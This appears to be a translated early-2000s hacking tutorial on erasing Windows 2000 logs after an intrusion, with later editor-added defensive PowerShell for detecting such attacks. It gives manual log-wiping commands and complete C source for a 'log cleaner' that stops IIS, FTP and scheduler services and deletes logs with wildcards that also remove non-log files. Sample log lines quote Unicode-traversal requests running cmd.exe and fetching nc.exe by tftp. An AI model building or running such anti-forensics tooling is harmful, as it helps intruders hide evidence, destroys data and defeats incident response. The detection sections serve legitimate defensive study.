
How a Windows 2000 log cleaner is made


The log files on Windows 2000 typically include the Application, Security and System logs, the DNS Server log, the FTP log, the WWW (IIS) log and so on; exactly which ones exist depends on the services the server has enabled.

The general procedure is as follows:

1. Clearing the IIS log.

Don't underestimate IIS logging. It records your whole intrusion in detail, for example the commands you typed into IE during a Unicode exploit and the traces left by your scan of port 80. Neglect it and the administrator will notice you, and then who knows what happens... heh.
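To make that warning concrete, here is what such an IIS log looks like from the defender's side. This is an added example and not code from the original article: the log lines are constructed in the W3C extended format that IIS 5 writes, the function name Find-UnicodeTraversal is the editor's, and the byte sequences it looks for are the overlong UTF-8 forms of "/" and "\" used by the IIS Unicode traversal bug (MS00-078). The parser reads the column layout from the #Fields: header, so it is not tied to this particular field order.

```powershell
# Added example, not from the original article. Constructed IIS 5 W3C extended log
# excerpt: a normal page view, two Unicode-traversal requests running cmd.exe, a call
# to the renamed copy of cmd.exe they created, and an unrelated client.
$SampleIisLog = @'
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-05-12 03:14:07
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-12 03:14:07 10.0.0.5 GET /default.asp - 200
2001-05-12 03:14:22 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-05-12 03:15:01 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\x.exe 200
2001-05-12 03:15:40 10.0.0.5 GET /scripts/x.exe /c+tftp+-i+10.0.0.5+GET+nc.exe 200
2001-05-12 03:16:02 10.0.0.9 GET /index.htm - 304
'@

function Find-UnicodeTraversal {
    param([string[]]$Lines)
    $fields = @()
    foreach ($line in $Lines) {
        if ($line -like '#Fields:*') {
            # Column names come from the header, so the parser is not tied to one layout.
            $fields = $line.Substring(8).Trim() -split '\s+'
            continue
        }
        if ($line -like '#*' -or $line.Trim() -eq '') { continue }
        $cols = $line -split '\s+'
        $rec = @{}
        for ($i = 0; $i -lt $fields.Count -and $i -lt $cols.Count; $i++) {
            $rec[$fields[$i]] = $cols[$i]
        }
        $stem  = [string]$rec['cs-uri-stem']
        $query = [string]$rec['cs-uri-query']
        # Overlong UTF-8 forms of '/' and '\' that slipped past the IIS path check,
        # a direct cmd.exe request, or a "/c ..." command line handed to a renamed copy.
        if ($stem -match '%c0%af|%c0%2f|%c1%1c|%c1%9c|cmd\.exe' -or $query -match '^/c\+') {
            [pscustomobject]@{
                Time    = '{0} {1}' -f $rec['date'], $rec['time']
                Client  = $rec['c-ip']
                Stem    = $stem
                Command = $query -replace '\+', ' '
                Status  = $rec['sc-status']
            }
        }
    }
}

Find-UnicodeTraversal -Lines ($SampleIisLog -split "`r?`n") | Format-Table -AutoSize
```

Three of the five constructed lines are flagged: the two cmd.exe requests and the call to x.exe, whose query string still carries the "/c" command line even though the file name no longer says cmd.exe. Every command the attacker typed into the browser is there with its timestamp and source address, which is exactly why the article wants this file gone.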

So let's clear it by hand.

1. Default log location: %systemroot%\system32\logfiles\w3svc1\, one log file per day by default. Change into that directory and run:

  del *.*

You probably think you're safe now, so do a dir. Hm, today's log is still there. Don't panic: the W3SVC service is still running and holds the current day's file open, so that one delete fails. How do we get rid of it?

Method one: if you can log in over 3389 (Terminal Services), open the file in Notepad, press Ctrl+A, then Delete, and save it empty.

Method two: the net command

  C:\>net stop w3svc
  The World Wide Web Publishing Service service is stopping. (this can take a long time, and may fail)
  The World Wide Web Publishing Service service was stopped successfully.

With W3SVC stopped we can empty its log directory: del *.* again.

Don't forget to start W3SVC again afterwards:

  C:\>net start w3svc

Be aware that the stop and start are themselves recorded: the Service Control Manager writes events 7035 and 7036 ("... service entered the stopped state" / "... entered the running state") to the System log, so this method trades one trace for another.

2. Clearing the FTP log.

FTP log default location: %systemroot%\system32\logfiles\msftpsvc1\, one log per day by default. Clear it the same way (the service to stop is MSFTPSVC).

3. Clearing the Scheduler log.

Scheduler service log default location: %systemroot%\SchedLgU.txt. Clear it the same way (the service is named Schedule).

4. Application, Security, System and DNS logs: default location %systemroot%\system32\config (AppEvent.Evt, SecEvent.Evt, SysEvent.Evt and, on a DNS server, DnsEvent.Evt).

These cannot be handled the same way: the Event Log service keeps the .evt files open and, as step 5 shows, refuses to be stopped, so a del fails with a sharing violation. Step 5 deals with them.

Note that the directories above may not be where stated, because the administrator may have moved them. The real locations can be read from the registry.

The Application, Security, System and DNS Server logs are registered under

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog

with one subkey per log; its File value (REG_EXPAND_SZ) names the .evt file.

The Scheduler service log is under

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

in the LogPath value.
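The following is an added example, not code from the original article, that reads those two registry locations instead of assuming the default paths. Windows 2000 itself has no PowerShell (read the same values with regedit there); on any later Windows the script runs as-is and shows the .evtx successors of the .evt files. The function names are the editor's; the registry value names File and LogPath are the real ones. Run it elevated, since the Security subkey is not readable by ordinary users.

```powershell
# Added example, not from the original article: resolve where each log really lives
# from the registry, the way the text describes, rather than trusting the defaults.

function Get-EventLogFileLocation {
    # One subkey per registered log (Application, Security, System, DNS Server, ...).
    # Its 'File' value (REG_EXPAND_SZ) names the backing file: *.evt under
    # \system32\config on Windows 2000, *.evtx under \system32\winevt\Logs later.
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\Eventlog'
    foreach ($key in Get-ChildItem -Path $base) {
        $raw = (Get-ItemProperty -Path $key.PSPath -Name File -ErrorAction SilentlyContinue).File
        if (-not $raw) { continue }
        # The registry provider normally expands %SystemRoot% already; expanding again is harmless.
        $path = [Environment]::ExpandEnvironmentVariables($raw)
        [pscustomobject]@{
            Log    = $key.PSChildName
            Path   = $path
            Exists = Test-Path -LiteralPath $path
        }
    }
}

function Get-SchedulerLogLocation {
    # Windows 2000/XP Task Scheduler (service name 'Schedule') keeps its log path in
    # the LogPath value under SchedulingAgent; the key does not exist on Vista and later,
    # so the function simply returns nothing there.
    $props = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\SchedulingAgent' -ErrorAction SilentlyContinue
    if ($props -and $props.LogPath) {
        [Environment]::ExpandEnvironmentVariables($props.LogPath)
    }
}

Get-EventLogFileLocation | Format-Table -AutoSize
Get-SchedulerLogLocation
```

An administrator who has relocated the logs, as the article warns, shows up here as a Path outside %SystemRoot%\system32\config; the same listing is also the first thing an incident responder runs to find out which files to image.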

5. I borrowed this part from someone else's article (to be honest, I copied it).

OK, congratulations: the easy logs are gone. Now for the hard part, the Security and System logs. The service guarding them is Event Log; let's try stopping it:

  D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
  The requested pause or stop is not valid for this service.

I give up. There's no way around it: it is a critical service. Without a third-party tool there is no way to delete the Security and System logs from the command line at all! So we are left with the simple but painfully slow method: open "Event Viewer" under "Administrative Tools" in the Control Panel (Windows 98 doesn't have it; now you see why Win2k is better). The "Action" menu has an entry called "Connect to another computer"; click it (the original article shows a screenshot here):

Enter the remote computer's IP, then light a cigarette and wait some tens of minutes, enduring what looks like a hang, until the next window opens (screenshot in the original):

Select the remote computer's Security log, right-click it and choose Properties:

Click the "Clear Log" button in the properties dialog. OK, the Security log is cleared! Suffer the same ordeal again for the System log.

What the button does is call the ClearEventLog API, and that call is not silent: Windows 2000 immediately writes Security event 517, "The audit log was cleared", as the first entry in the emptied log, naming the account that cleared it.

6. Most of the important logs are now cleared. What's left is to catch anything that may have been missed. Delete the following files:

  \winnt\*.log

and, under system32:

  \logfiles\*.*
  \dtclog\*.*
  \config\*.evt
  \*.log
  \*.txt

Two caveats: \config\*.evt fails for the reason given in step 4 (the files are held open by the Event Log service), and the *.log and *.txt wildcards in \winnt and system32 also remove files that are not logs at all.

So far I have shown you how to clear most of the logs I know of; now put it to use.

Actually, the main purpose of this article is not to teach you how to clear logs, but to teach you to write a log-clearing tool. Treat everything above as preamble.

Now to the real subject.

You have seen what it takes to clear all the logs by hand: it's tedious, takes a lot of time, and sometimes still isn't thorough. Anyone who can program will think: I can code, what am I afraid of? So let's get to work.

You already know that to clear some logs you first have to stop some services.

So first I'll show you how to write a small DOS tool that lists the services on a machine; for the implementation see my earlier article 《如果做一個dos下的服務程序查看器》 (How to make a DOS service viewer).

The tool is called serName.exe. Run it:

  serName.exe -t 1 -t 1

and all the services running on the machine are listed. Note the names of the services you need to stop; you'll need them below.

The second step of the program is to stop the W3SVC, Schedule, FTP and other services.

My code is as follows. Read it slowly with MSDN at hand. (It isn't hard; if something is unclear, don't come asking me.)

// Build as an ANSI (non-UNICODE) Win32 console program: the string literals are
// narrow, so TCHAR must be char.
#include <windows.h>
#include <stdio.h>

void StopServices(LPCTSTR lpServiceName)
{
    // OpenSCManager implicitly grants SC_MANAGER_CONNECT, which is all OpenService needs.
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!scman)
    {
        printf("OpenSCManager failed, error %lu\n", ::GetLastError());
        return;
    }
    SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
    if (sh)
    {
        SERVICE_STATUS ServiceStatus;
        // TRUE only means the stop request was accepted; ServiceStatus.dwCurrentState is
        // usually still SERVICE_STOP_PENDING, so poll the state before touching its files.
        BOOL bControl = ::ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus);
        if (bControl)
        {
            printf("success to stop the service \"%s\"\n", lpServiceName);
        }
        else
        {
            DWORD dwControl = ::GetLastError();
            switch (dwControl)
            {
            case ERROR_ACCESS_DENIED:            printf("The specified handle was not opened with the necessary access.\n"); break;
            case ERROR_SERVICE_NOT_ACTIVE:       printf("The service has not been started.\n"); break;
            case ERROR_DEPENDENT_SERVICES_RUNNING: printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
            case ERROR_INVALID_SERVICE_CONTROL:  printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
            case ERROR_SERVICE_CANNOT_ACCEPT_CTRL: printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
            case ERROR_SERVICE_REQUEST_TIMEOUT:  printf("The service did not respond to the stop request in a timely fashion.\n"); break;
            default:                             printf("ControlService failed, error %lu\n", dwControl); break;
            }
        }
        ::CloseServiceHandle(sh);
    }
    else
    {
        printf("OpenService(\"%s\") failed, error %lu\n", lpServiceName, ::GetLastError());
    }
    ::CloseServiceHandle(scman);
}

With the function in place, write a main function to try it:

int main()
{
    StopServices("W3SVC");
    return 0;
}

OK, it worked. If it didn't, look at the error message that was printed.

Good, we now have a function that stops a service; we also need one that starts a service.

If you understood the above, the following code is just a small variation of it.

void StartServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!scman)
    {
        printf("OpenSCManager failed, error %lu\n", ::GetLastError());
        return;
    }
    SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
    if (sh)
    {
        // argv[0] of a service is conventionally its own name; no other arguments are passed.
        BOOL bControl = ::StartService(sh, 1, &lpServiceName);
        if (bControl)
        {
            printf("success to start the service \"%s\"\n", lpServiceName);
        }
        else
        {
            DWORD dwControl = ::GetLastError();
            switch (dwControl)
            {
            case ERROR_ACCESS_DENIED:             printf("The specified handle was not opened with SERVICE_START access.\n"); break;
            case ERROR_INVALID_HANDLE:            printf("The specified handle is invalid.\n"); break;
            case ERROR_PATH_NOT_FOUND:            printf("The service binary file could not be found.\n"); break;
            case ERROR_SERVICE_ALREADY_RUNNING:   printf("An instance of the service is already running.\n"); break;
            case ERROR_SERVICE_DATABASE_LOCKED:   printf("The database is locked.\n"); break;
            case ERROR_SERVICE_DEPENDENCY_DELETED: printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
            case ERROR_SERVICE_DEPENDENCY_FAIL:   printf("The service depends on another service that has failed to start.\n"); break;
            case ERROR_SERVICE_DISABLED:          printf("The service has been disabled.\n"); break;
            case ERROR_SERVICE_LOGON_FAILED:      printf("The service could not be logged on.\n"); break;
            case ERROR_SERVICE_MARKED_FOR_DELETE: printf("The service has been marked for deletion.\n"); break;
            case ERROR_SERVICE_NO_THREAD:         printf("A thread could not be created for the service.\n"); break;
            case ERROR_SERVICE_REQUEST_TIMEOUT:   printf("The service did not respond to the start request in a timely fashion.\n"); break;
            default:                              printf("StartService failed, error %lu\n", dwControl); break;
            }
        }
        ::CloseServiceHandle(sh);
    }
    else
    {
        printf("OpenService(\"%s\") failed, error %lu\n", lpServiceName, ::GetLastError());
    }
    ::CloseServiceHandle(scman);
}

Just a few small changes.

Now that you have these two weapons, what's left is to apply the knowledge from the first part and delete the files; I don't think I need to show you, you have surely worked out how.

Now the third weapon. It is optional for our program, but essential for a polished one: a function that reports a service's state. My code follows.

DWORD GetServicesState(LPCTSTR lpServiceName)
{
    // 0 is not a valid SERVICE_* state, so it doubles as "unknown" on any failure.
    // (The original left dwState uninitialised when the SCM or the service could not be opened.)
    DWORD dwState = 0;
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
        if (sh)
        {
            SERVICE_STATUS ServiceStatus;
            BOOL bQuery = ::QueryServiceStatus(sh, &ServiceStatus);
            if (bQuery)
            {
                dwState = ServiceStatus.dwCurrentState;   // SERVICE_RUNNING, SERVICE_STOPPED, SERVICE_STOP_PENDING, ...
            }
            else
            {
                switch (::GetLastError())
                {
                case ERROR_ACCESS_DENIED:  printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return dwState;
}

Now we have everything; let's complete the program.

The rest of the code follows. Before running it, adjust the source to the specifics of the system you are attacking.

//==========================================================//
// 綠兵日志Cleaner1.0                                          //
// Compiled by http://www.vertarmy.com 綠色兵團                 //
// http://vcghost.yeah.net 編の魂(tryibest)                    //
// [email protected]                                            //
//==========================================================//
// Build as an ANSI (non-UNICODE) Win32 console program: the string literals
// are narrow, so TCHAR must be char.
#include <windows.h>
#include <stdio.h>

void  StopServices(LPCTSTR lpServiceName);
void  StartServices(LPCTSTR lpServiceName);
DWORD GetServicesState(LPCTSTR lpServiceName);
BOOL  WaitForServiceState(LPCTSTR lpServiceName, DWORD dwWanted, DWORD dwTimeoutMs);
void  DelFile(LPCTSTR lpFileName);
void  DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory);
void  GetParentDirectory(LPTSTR lpPath);
void  DelServiceLogs(LPCTSTR lpServiceName, LPCTSTR lpLogSubDir);
void  Del3WFile();
void  DelFtpFile();
void  DelSheduleFile();
void  DelOtherFile();
void  ShowTitle();

int main(int argc, char *argv[])
{
    ShowTitle();
    DelOtherFile();
    Del3WFile();
    DelFtpFile();
    DelSheduleFile();
    ShowTitle();
    return 0;
}

void StopServices(LPCTSTR lpServiceName)
{
    // OpenSCManager implicitly grants SC_MANAGER_CONNECT, which is all OpenService needs.
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!scman)
    {
        printf("OpenSCManager failed, error %lu\n", ::GetLastError());
        return;
    }
    SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
    if (sh)
    {
        SERVICE_STATUS ServiceStatus;
        // TRUE only means the stop request was accepted; the service is usually still
        // SERVICE_STOP_PENDING, which is why the callers wait on WaitForServiceState.
        if (::ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus))
        {
            printf("success to stop the service \"%s\"\n", lpServiceName);
        }
        else
        {
            DWORD dwControl = ::GetLastError();
            switch (dwControl)
            {
            case ERROR_ACCESS_DENIED:              printf("The specified handle was not opened with the necessary access.\n"); break;
            case ERROR_SERVICE_NOT_ACTIVE:         printf("The service has not been started.\n"); break;
            case ERROR_DEPENDENT_SERVICES_RUNNING: printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
            case ERROR_INVALID_SERVICE_CONTROL:    printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
            case ERROR_SERVICE_CANNOT_ACCEPT_CTRL: printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
            case ERROR_SERVICE_REQUEST_TIMEOUT:    printf("The service did not respond to the stop request in a timely fashion.\n"); break;
            default:                               printf("ControlService failed, error %lu\n", dwControl); break;
            }
        }
        ::CloseServiceHandle(sh);
    }
    else
    {
        printf("OpenService(\"%s\") failed, error %lu\n", lpServiceName, ::GetLastError());
    }
    ::CloseServiceHandle(scman);
}

void StartServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!scman)
    {
        printf("OpenSCManager failed, error %lu\n", ::GetLastError());
        return;
    }
    SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
    if (sh)
    {
        // argv[0] of a service is conventionally its own name; no other arguments are passed.
        if (::StartService(sh, 1, &lpServiceName))
        {
            printf("success to start the service \"%s\"\n", lpServiceName);
        }
        else
        {
            DWORD dwControl = ::GetLastError();
            switch (dwControl)
            {
            case ERROR_ACCESS_DENIED:              printf("The specified handle was not opened with SERVICE_START access.\n"); break;
            case ERROR_INVALID_HANDLE:             printf("The specified handle is invalid.\n"); break;
            case ERROR_PATH_NOT_FOUND:             printf("The service binary file could not be found.\n"); break;
            case ERROR_SERVICE_ALREADY_RUNNING:    printf("An instance of the service is already running.\n"); break;
            case ERROR_SERVICE_DATABASE_LOCKED:    printf("The database is locked.\n"); break;
            case ERROR_SERVICE_DEPENDENCY_DELETED: printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
            case ERROR_SERVICE_DEPENDENCY_FAIL:    printf("The service depends on another service that has failed to start.\n"); break;
            case ERROR_SERVICE_DISABLED:           printf("The service has been disabled.\n"); break;
            case ERROR_SERVICE_LOGON_FAILED:       printf("The service could not be logged on.\n"); break;
            case ERROR_SERVICE_MARKED_FOR_DELETE:  printf("The service has been marked for deletion.\n"); break;
            case ERROR_SERVICE_NO_THREAD:          printf("A thread could not be created for the service.\n"); break;
            case ERROR_SERVICE_REQUEST_TIMEOUT:    printf("The service did not respond to the start request in a timely fashion.\n"); break;
            default:                               printf("StartService failed, error %lu\n", dwControl); break;
            }
        }
        ::CloseServiceHandle(sh);
    }
    else
    {
        printf("OpenService(\"%s\") failed, error %lu\n", lpServiceName, ::GetLastError());
    }
    ::CloseServiceHandle(scman);
}

DWORD GetServicesState(LPCTSTR lpServiceName)
{
    // 0 is not a valid SERVICE_* state, so it doubles as "unknown" on any failure.
    DWORD dwState = 0;
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
        if (sh)
        {
            SERVICE_STATUS ServiceStatus;
            if (::QueryServiceStatus(sh, &ServiceStatus))
            {
                dwState = ServiceStatus.dwCurrentState;
            }
            else
            {
                switch (::GetLastError())
                {
                case ERROR_ACCESS_DENIED:  printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return dwState;
}

// Poll until the service reaches dwWanted (e.g. SERVICE_STOPPED) or the timeout
// expires. This replaces the fixed Sleep(1000) of the original, which raced the
// service shutdown (the original's own comment flagged that as needing work).
BOOL WaitForServiceState(LPCTSTR lpServiceName, DWORD dwWanted, DWORD dwTimeoutMs)
{
    DWORD dwStart = ::GetTickCount();
    while (::GetTickCount() - dwStart < dwTimeoutMs)
    {
        if (GetServicesState(lpServiceName) == dwWanted)
            return TRUE;
        ::Sleep(250);
    }
    return GetServicesState(lpServiceName) == dwWanted;
}

void DelFile(LPCTSTR lpFileName)
{
    if (::DeleteFile(lpFileName))
        printf("delete file \"%s\" success\n", lpFileName);
    else
        printf("delete file \"%s\" fail (error %lu)\n", lpFileName, ::GetLastError());
}

// Delete every file matching the wildcard lpFileName; lpDirectory is the directory
// part of the same pattern, with a trailing backslash.
void DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory)
{
    TCHAR tcFileName[1024];
    WIN32_FIND_DATA FindFileData;
    HANDLE hFile = ::FindFirstFile(lpFileName, &FindFileData);
    if (hFile == INVALID_HANDLE_VALUE)
        return;                       // nothing matched, or the directory does not exist
    do
    {
        // "*.*" also matches ".", ".." and subdirectories; DeleteFile cannot remove those.
        if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            continue;
        lstrcpy(tcFileName, lpDirectory);
        lstrcat(tcFileName, FindFileData.cFileName);
        DelFile(tcFileName);
    } while (::FindNextFile(hFile, &FindFileData));
    ::FindClose(hFile);
}

// Strip the last path component in place: "C:\WINNT\system32" -> "C:\WINNT".
void GetParentDirectory(LPTSTR lpPath)
{
    int iLength = lstrlen(lpPath);
    while (iLength > 0 && lpPath[iLength - 1] != '\\')
        iLength--;
    if (iLength > 0)
        lpPath[iLength - 1] = '\0';
}

// Shared by the IIS and FTP logs: stop the service if it is running (it holds the
// current day's log open), delete the *.log files, then start it again.
void DelServiceLogs(LPCTSTR lpServiceName, LPCTSTR lpLogSubDir)
{
    TCHAR tcDirectory[1024];
    TCHAR tcPattern[1024];
    ::GetSystemDirectory(tcDirectory, 1024);
    lstrcat(tcDirectory, lpLogSubDir);          // e.g. "\\logfiles\\w3svc1\\"
    lstrcpy(tcPattern, tcDirectory);
    lstrcat(tcPattern, "*.log");

    BOOL bWasRunning = (GetServicesState(lpServiceName) == SERVICE_RUNNING);
    if (bWasRunning)
    {
        StopServices(lpServiceName);
        WaitForServiceState(lpServiceName, SERVICE_STOPPED, 30000);
    }
    DelFiles(tcPattern, tcDirectory);
    if (bWasRunning)
        StartServices(lpServiceName);
}

void Del3WFile()
{
    DelServiceLogs("w3svc", "\\logfiles\\w3svc1\\");
}

void DelFtpFile()
{
    DelServiceLogs("msftpsvc", "\\logfiles\\msftpsvc1\\");
}

void DelSheduleFile()
{
    TCHAR tcScheduleFile[1024];
    ::GetSystemDirectory(tcScheduleFile, 1024);
    GetParentDirectory(tcScheduleFile);           // %SystemRoot%
    lstrcat(tcScheduleFile, "\\SchedLgU.txt");

    BOOL bWasRunning = (GetServicesState("schedule") == SERVICE_RUNNING);
    if (bWasRunning)
    {
        StopServices("schedule");
        WaitForServiceState("schedule", SERVICE_STOPPED, 30000);
    }
    DelFile(tcScheduleFile);
    if (bWasRunning)
        StartServices("schedule");
}

void DelOtherFile()
{
    TCHAR tcSystemDirectory[1024];
    TCHAR tcWinDirectory[1024];
    TCHAR tcOtherFile[1024];
    TCHAR tcOtherDirectory[1024];
    ::GetSystemDirectory(tcSystemDirectory, 1024);
    lstrcpy(tcWinDirectory, tcSystemDirectory);
    GetParentDirectory(tcWinDirectory);           // \winnt

    // Directory (relative to a base) and wildcard for each sweep. Note that
    // "\\config\\*.*" also names the registry hives and the .evt event logs; all of
    // those are held open by the system, so those deletes fail, and the *.log and
    // *.txt sweeps of \winnt and system32 also remove files that are not logs.
    struct { LPCTSTR lpBase; LPCTSTR lpSubDir; LPCTSTR lpPattern; } targets[] = {
        { tcSystemDirectory, "\\logfiles\\", "*.*"   },   // files directly under logfiles
        { tcSystemDirectory, "\\dtclog\\",   "*.*"   },
        { tcSystemDirectory, "\\config\\",   "*.*"   },
        { tcSystemDirectory, "\\",           "*.log" },
        { tcSystemDirectory, "\\",           "*.txt" },
        { tcWinDirectory,    "\\",           "*.log" },   // \winnt\*.log
        { tcWinDirectory,    "\\",           "*.txt" },   // \winnt\*.txt
    };
    for (int i = 0; i < (int)(sizeof(targets) / sizeof(targets[0])); i++)
    {
        lstrcpy(tcOtherDirectory, targets[i].lpBase);
        lstrcat(tcOtherDirectory, targets[i].lpSubDir);
        lstrcpy(tcOtherFile, tcOtherDirectory);
        lstrcat(tcOtherFile, targets[i].lpPattern);
        DelFiles(tcOtherFile, tcOtherDirectory);
    }
}

void ShowTitle()
{
    printf("===========================================================\n");
    printf("$ 綠兵日志Cleaner1.0 $\n");
    printf("$ Compiled by http://www.vertarmy.com 綠色兵團 $\n");
    printf("$ http://vcghost.yeah.net 編の魂(tryibest) $\n");
    printf("$ [email protected] $\n");
    printf("===========================================================\n");
}
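One thing the program above cannot clean up is its own footprint in the System log, which the article already admits it cannot touch. Stopping and restarting W3SVC, MSFTPSVC and Schedule makes the Service Control Manager write event 7036 for each transition ("The <display name> service entered the stopped/running state."), so three logging services bouncing within seconds of each other is the tool's signature. The following is an added example, not part of the original article, that looks for exactly that pattern; the event records are constructed to mirror what Get-WinEvent returns, and the function name and the ten-second window are the editor's choices.

```powershell
# Added example, not from the original article. Constructed System-log records in the
# shape Get-WinEvent returns; on a live host replace $SampleEvents with
#   Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Service Control Manager'; Id=7036}
$SampleEvents = @(
    @{ TimeCreated = [datetime]'2001-05-12 03:05:00'; Id = 7036; Message = 'The Print Spooler service entered the stopped state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:20:00'; Id = 7036; Message = 'The World Wide Web Publishing Service service entered the stopped state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:20:02'; Id = 7036; Message = 'The World Wide Web Publishing Service service entered the running state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:20:03'; Id = 7036; Message = 'The FTP Publishing Service service entered the stopped state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:20:05'; Id = 7036; Message = 'The FTP Publishing Service service entered the running state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:20:06'; Id = 7036; Message = 'The Task Scheduler service entered the stopped state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:20:08'; Id = 7036; Message = 'The Task Scheduler service entered the running state.' }
    @{ TimeCreated = [datetime]'2001-05-12 03:45:00'; Id = 7036; Message = 'The Print Spooler service entered the running state.' }
) | ForEach-Object { [pscustomobject]$_ }

function Find-ServiceBounce {
    # Pair each "stopped" with the next "running" of the same service and report the
    # ones that came back within $WindowSeconds; only alert when several services did.
    param([object[]]$Events, [int]$WindowSeconds = 10, [int]$MinServices = 2)
    $stoppedAt = @{}
    $bounces = foreach ($e in ($Events | Where-Object Id -eq 7036 | Sort-Object TimeCreated)) {
        if ($e.Message -match '^The (.+) service entered the (stopped|running) state\.$') {
            $svc = $Matches[1]
            if ($Matches[2] -eq 'stopped') {
                $stoppedAt[$svc] = $e.TimeCreated
            } elseif ($stoppedAt.ContainsKey($svc)) {
                $gap = ($e.TimeCreated - $stoppedAt[$svc]).TotalSeconds
                if ($gap -le $WindowSeconds) {
                    [pscustomobject]@{ Service = $svc; StoppedAt = $stoppedAt[$svc]; DownSeconds = $gap }
                }
                $stoppedAt.Remove($svc)
            }
        }
    }
    # A single quick restart is routine administration; several in one window is the cleaner's pattern.
    if (@($bounces).Count -ge $MinServices) { $bounces }
}

Find-ServiceBounce -Events $SampleEvents | Format-Table -AutoSize
```

On the constructed data the Print Spooler restart forty minutes later is ignored and the three two-second bounces at 03:20 are reported together. Pairing the 7036 timestamps with the Security event 517 from step 5 and the sudden absence of that day's W3SVC1 log file reconstructs the whole clean-up, which is the practical answer to the article's remark that hand cleaning is "sometimes still not thorough".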
